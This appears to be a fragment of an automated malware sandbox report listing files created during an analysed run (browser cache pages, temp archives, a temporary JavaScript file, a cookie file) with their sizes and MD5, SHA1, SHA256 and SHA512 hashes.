    0c7a90333d1173670c2ced5613dda98e957aae7945bc985d3b8a953cb4f40d6c96d022859ea84232801055c8023b9e9599f7a0a8c968c58d4017299d9463f6b1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    c17a69320f742d008bb48fb6ed10890f

    SHA1

    6f30760a4af1d7a2d5734d60f5dd2f154d07acb9

    SHA256

    d18a4b1f788d66e5f52c6019e6d58b69d061971e3e0a42245068249cbcf75f27

    SHA512

    f7b49407d2ccffcebccdc3f472b74d63054b00267e18672cc8c09260dcb5af7d866008c2693ed0ee6b2d8944b0f9c1aaca771c5133175d7922b7d0ac09ecddd8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

    Filesize

    6KB

    MD5

    8bd38a8a936ea081120173234e9f59e3

    SHA1

    d0b655261dd6012872770d7b2d0b02e7c5e2fb7d

    SHA256

    ddef95cb86191c91d1aa3ed8d5f2f6776a7c17a491b00c24b6c8fae1dc2e0a34

    SHA512

    1bbd548193854fe871874f31e892e924edc98967f58d3f05448a2f4a81e4886ca66264b6866c11b6f8b8d2ffab52dd6658660baa4cded4d1ecb14f2138d1b656

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

    Filesize

    6KB

    MD5

    70930af9fed4ce231e22333e5971a68f

    SHA1

    af36242d8a3b0ff1f98bf0ee68723a7ac425eb77

    SHA256

    9c008b3123108b866112bfd4c74ea854f14d96b0b73e3e537c7679f3a986147b

    SHA512

    620bb2ed1f20b31b9fc65ca2a1dbab54c87aebefb0fea00def82c62e1cacf62de2042dbac23e17462c155edb94cd325d9f8bc2f05696ca95e3fa096cc7b94d84

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

    Filesize

    6KB

    MD5

    b920a0ce34c904a5895657039f26ce55

    SHA1

    1333e2a5d9aeeed0442cea61af422c36dd524338

    SHA256

    b7261105edf5940654c31f21db75275dd2c64431111ec7829ea284095fd2c905

    SHA512

    ae4d5ea67e211f8d2b06f318a4a80fce571a23862e2162225a2aeb83ce478d49590c15d3bdf04ebd718675ab99b36a04f270fe9decde411175804ea4732ba898

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

    Filesize

    6KB

    MD5

    2318f906f39c47ef62271fa894b7c535

    SHA1

    0140c5091fb39c2251000ae70ac8010c65c0fe5f

    SHA256

    330d96322c2353489c32728be3bda447e10df668c251fbcd51c42996461c4704

    SHA512

    9f8b197a1f225c936a1b481009f27a3d1a1320dfea265451402dd89b056955c8e08920539759b36f8a67c4703326565eab780c29e8af7a8f5197be945920979c

  • C:\Users\Admin\AppData\Local\Temp\Cab41C1.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar59E4.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\fuf120A.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FF0A0K5P.txt

    Filesize

    173B

    MD5

    95ab875ac70daa5e680726bf0be2b415

    SHA1

    c57dee695a9a6e5271af050e1ffc0598be81fc7f

    SHA256

    c04e6c9c5bbb4b9def415038c88ce76d966baede66a1f8b828eb1f36eacad26c

    SHA512

    325fc2ce94b612dc28c8971367a3b477e9f211d06e88cc568d1f0c59a6025b27c015d458744ac9e8c28e878c17ae82b537cfa464bbdeb818902644e8f7654b7a
